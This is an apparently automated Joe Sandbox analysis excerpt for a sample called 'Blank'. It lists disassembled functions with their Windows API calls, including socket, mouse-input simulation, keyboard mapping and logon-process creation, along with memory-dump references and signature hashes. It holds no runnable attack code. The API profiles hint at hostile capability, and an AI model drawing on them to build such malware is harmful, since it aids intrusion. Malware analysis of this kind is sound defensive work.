                                                                                                                                    APIs
                                                                                                                                    • GetMenu.USER32(?), ref: 002E5E38
                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 002E5E6F
                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002E5E97
                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 002E5F06
                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 002E5F14
                                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 002E5F65
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 650687236-0
                                                                                                                                    • Opcode ID: e8a1756c3b7b43be928d6b67b78eba375cd24fc788db56736149a2a77764ef7f
                                                                                                                                    • Instruction ID: a5d37018412fedab1587a720bbc77d824f5e5eb0d3639213b06a38d73b23d364
                                                                                                                                    • Opcode Fuzzy Hash: e8a1756c3b7b43be928d6b67b78eba375cd24fc788db56736149a2a77764ef7f
                                                                                                                                    • Instruction Fuzzy Hash: 1151CC35A21625EFCB11EF65C845AAEB7B4EF48324F5440A9F805BB391CB70AE51CF90
                                                                                                                                    Function 002BF688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #8.OLEAUT32(?,00000000,?,?,?,?,?,?,00000024), ref: 002BF6A2
                                                                                                                                    • #9.WSOCK32(00000013,?,?,?,?,00000024), ref: 002BF714
                                                                                                                                    • #9.WSOCK32(00000000,?,?,?,?,00000024), ref: 002BF76F
                                                                                                                                    • _memmove.LIBCMT ref: 002BF799
                                                                                                                                    • #9.WSOCK32(?,?,?,?,?,00000024), ref: 002BF7E6
                                                                                                                                    • #12.WSOCK32(?,?,00000000,00000013,00000000,?,?,?,?,?,?,00000024), ref: 002BF814
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                    • Opcode ID: 7b270b8c90ed0700ad7e3b5779677349c734beab5569d82bbf3b6676be2c9328
                                                                                                                                    • Instruction ID: e13718eef1c06ba1752769cbda798a0672dd9b25fc5097f392657b22a8940d59
                                                                                                                                    • Opcode Fuzzy Hash: 7b270b8c90ed0700ad7e3b5779677349c734beab5569d82bbf3b6676be2c9328
                                                                                                                                    • Instruction Fuzzy Hash: 695149B5A10209EFDB14CF58D884AAAB7B8FF4C354F15856AE959DB301E730E911CFA0
                                                                                                                                    Function 002C29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002C29FF
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C2A4A
                                                                                                                                    • IsMenu.USER32(00000000), ref: 002C2A6A
                                                                                                                                    • CreatePopupMenu.USER32 ref: 002C2A9E
                                                                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 002C2AFC
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002C2B2D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3311875123-0
                                                                                                                                    • Opcode ID: d640c5bd4fd909130c5dc0f0100ae5e023f764b2d788d48322106a11ad4cef21
                                                                                                                                    • Instruction ID: 5b6e7467ea15f2e732e1687b036927a05421e8d164ff6ae5fb91fd3abdc86246
                                                                                                                                    • Opcode Fuzzy Hash: d640c5bd4fd909130c5dc0f0100ae5e023f764b2d788d48322106a11ad4cef21
                                                                                                                                    • Instruction Fuzzy Hash: ED518F7062024ADFDF25CF68D888FAEBBF4AF54318F10425DE81597291DBB09D68CB51
                                                                                                                                    Function 00261B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00261B76
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00261BDA
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00261BF7
                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00261C08
                                                                                                                                    • EndPaint.USER32(?,?), ref: 00261C52
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1827037458-0
                                                                                                                                    • Opcode ID: 854ffae1d7255b7c74d2d09e52f3085cef00ffb0add4925850eafd299a4aaef4
                                                                                                                                    • Instruction ID: 4dcc4dca9a83163f9711ad86e56312f2c1af966a6ab18367386a356070412692
                                                                                                                                    • Opcode Fuzzy Hash: 854ffae1d7255b7c74d2d09e52f3085cef00ffb0add4925850eafd299a4aaef4
                                                                                                                                    • Instruction Fuzzy Hash: 5641D4301143019FD721DF24DCC9FBA7BE8FB49764F140669F955872A2C730A865DB62
                                                                                                                                    Function 002EBD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(003277B0,00000000,?,?,?,003277B0,?,002EBC1A,?,?), ref: 002EBD84
                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 002EBDA8
                                                                                                                                    • ShowWindow.USER32(003277B0,00000000,?,?,?,003277B0,?,002EBC1A,?,?), ref: 002EBE08
                                                                                                                                    • ShowWindow.USER32(?,00000004,?,002EBC1A,?,?), ref: 002EBE1A
                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 002EBE3E
                                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 002EBE61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                    • Opcode ID: 7b6eeabaa76eaff84a435a59ae2d66c2fe789e531acc68a24ba67b3c6963d68c
                                                                                                                                    • Instruction ID: 069ef9a4bc54ea7bd909128e04e90910478688af70cb710383701ecdddd40559
                                                                                                                                    • Opcode Fuzzy Hash: 7b6eeabaa76eaff84a435a59ae2d66c2fe789e531acc68a24ba67b3c6963d68c
                                                                                                                                    • Instruction Fuzzy Hash: C9417434650185AFDB23CF15D889BE67BE5FF09314F9841B9EA488F2A2C731AC65CB50
                                                                                                                                    Function 002D7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,002D550C,?,?,00000000,00000001), ref: 002D7796
                                                                                                                                      • Part of subcall function 002D406C: GetWindowRect.USER32(?,?), ref: 002D407F
                                                                                                                                    • GetDesktopWindow.USER32 ref: 002D77C0
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002D77C7
                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002D77F9
                                                                                                                                      • Part of subcall function 002C57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002C5877
                                                                                                                                    • GetCursorPos.USER32(?), ref: 002D7825
                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002D7883
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4137160315-0
                                                                                                                                    • Opcode ID: 2ea15c2356a18732e7556dbc7c9aabd9fe7bd1ddd84cdce14fe0ecdc7605cc66
                                                                                                                                    • Instruction ID: 6747dde22f4561b128e51860f492af50266014388ad5ec72ca245f0515e11941
                                                                                                                                    • Opcode Fuzzy Hash: 2ea15c2356a18732e7556dbc7c9aabd9fe7bd1ddd84cdce14fe0ecdc7605cc66
                                                                                                                                    • Instruction Fuzzy Hash: 9331D272508316ABD720DF14D849FABB7A9FF88354F000A2AF585D7182DA74ED58CB92
                                                                                                                                    Function 002D696E Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #23.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002D69C7
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D69D6
                                                                                                                                    • #2.WSOCK32(00000000,?,00000010), ref: 002D69F2
                                                                                                                                    • #13.WSOCK32(00000000,00000005), ref: 002D6A01
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D6A1B
                                                                                                                                    • #3.WSOCK32(00000000,00000000), ref: 002D6A2F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: #111
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 568940515-0
                                                                                                                                    • Opcode ID: 1a317aada82754fee1a059ba6a76f7cd76291ef77adf4651a95bfbaa9a9ddcd2
                                                                                                                                    • Instruction ID: 7356b4ed74aec66fa87f30be9df7eba04bd2bcda76634f4d69e6b65e2de33b49
                                                                                                                                    • Opcode Fuzzy Hash: 1a317aada82754fee1a059ba6a76f7cd76291ef77adf4651a95bfbaa9a9ddcd2
                                                                                                                                    • Instruction Fuzzy Hash: CA21D270610201AFCB00EF68DC89A7EB7A9EF44760F148159F896A7392CB70AC51CF90
                                                                                                                                    Function 002B9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002B8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002B8CDE
                                                                                                                                      • Part of subcall function 002B8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002B8CE8
                                                                                                                                      • Part of subcall function 002B8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002B8CF7
                                                                                                                                      • Part of subcall function 002B8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002B8CFE
                                                                                                                                      • Part of subcall function 002B8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002B8D14
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,002B904D), ref: 002B9482
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002B948E
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 002B9495
                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 002B94AE
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,002B904D), ref: 002B94C2
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 002B94C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                    • Opcode ID: 83ef22223313c255ea6f9f98c05880f79096bb10d303bebf19295d052b52e596
                                                                                                                                    • Instruction ID: 1bdf1fbbdef2649bab6c8db85e83494c7c017e5cdeac6be1aa4c8c2f122dd07f
                                                                                                                                    • Opcode Fuzzy Hash: 83ef22223313c255ea6f9f98c05880f79096bb10d303bebf19295d052b52e596
                                                                                                                                    • Instruction Fuzzy Hash: A511E135520209FFDB108FA4DC49BFF7BB9FB413A1F108028E94593210C736A995CB60
                                                                                                                                    Function 002B91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002B9200
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 002B9207
                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002B9216
                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 002B9221
                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002B9250
                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 002B9264
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                    • Opcode ID: 184ea6c1c974e3884e335d7a2f279c2e640f69a381a330f0c36e4ad0c74ddd64
                                                                                                                                    • Instruction ID: 5f2e423988b1ef700627b192362e2562bf3f4a23f6e86e0589c5f40b0a6c0e47
                                                                                                                                    • Opcode Fuzzy Hash: 184ea6c1c974e3884e335d7a2f279c2e640f69a381a330f0c36e4ad0c74ddd64
                                                                                                                                    • Instruction Fuzzy Hash: 8C115E7251120EABDF018F98ED8DFEE7BA9EF08394F044064FE04A2161C7719D60EB60
                                                                                                                                    Function 002BC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 002BC34E
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 002BC35F
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002BC366
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 002BC36E
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002BC385
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 002BC397
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                    • Opcode ID: 7b7557997d1a0397ba7fc783603b20f54feb65f5ba0023f5ff38f3339191b79d
                                                                                                                                    • Instruction ID: 799f502ffce46d1d41aff14e0bc4558ce551c289deb2b752fcd180055724fc15
                                                                                                                                    • Opcode Fuzzy Hash: 7b7557997d1a0397ba7fc783603b20f54feb65f5ba0023f5ff38f3339191b79d
                                                                                                                                    • Instruction Fuzzy Hash: 21014475E00219BBEF109FA59C49A5EBFB8EB887A1F104065FA08E7281D6719D10CFA0
                                                                                                                                    Function 002EC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002616CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00261729
                                                                                                                                      • Part of subcall function 002616CF: SelectObject.GDI32(?,00000000), ref: 00261738
                                                                                                                                      • Part of subcall function 002616CF: BeginPath.GDI32(?), ref: 0026174F
                                                                                                                                      • Part of subcall function 002616CF: SelectObject.GDI32(?,00000000), ref: 00261778
                                                                                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002EC57C
                                                                                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 002EC590
                                                                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002EC59E
                                                                                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 002EC5AE
                                                                                                                                    • EndPath.GDI32(00000000), ref: 002EC5BE
                                                                                                                                    • StrokePath.GDI32(00000000), ref: 002EC5CE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                    • Opcode ID: 2f0250153ea9f208eab675c3ceafd95a22e7c9067d9cac00a9b7ac662c75c8e6
                                                                                                                                    • Instruction ID: be1bfbac3c850d610153601425dea5ea1312fbcb3cd717140ef1d76b963116cf
                                                                                                                                    • Opcode Fuzzy Hash: 2f0250153ea9f208eab675c3ceafd95a22e7c9067d9cac00a9b7ac662c75c8e6
                                                                                                                                    • Instruction Fuzzy Hash: 25111E7600014DBFDF129F91EC88FEA7F6DEB043A4F048025FA1856161C771AD65DBA0
                                                                                                                                    Function 002807BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002807EC
                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 002807F4
                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002807FF
                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0028080A
                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00280812
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028081A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                    • Opcode ID: 2d57714e0289fbce898e2b215c7f779472e0ec655648e96ec980ebb3c0a7d1f5
                                                                                                                                    • Instruction ID: 767e4040a8a80a3d597db72217fc9f9384c6fd0178c809bd48c3c56cf20c54a7
                                                                                                                                    • Opcode Fuzzy Hash: 2d57714e0289fbce898e2b215c7f779472e0ec655648e96ec980ebb3c0a7d1f5
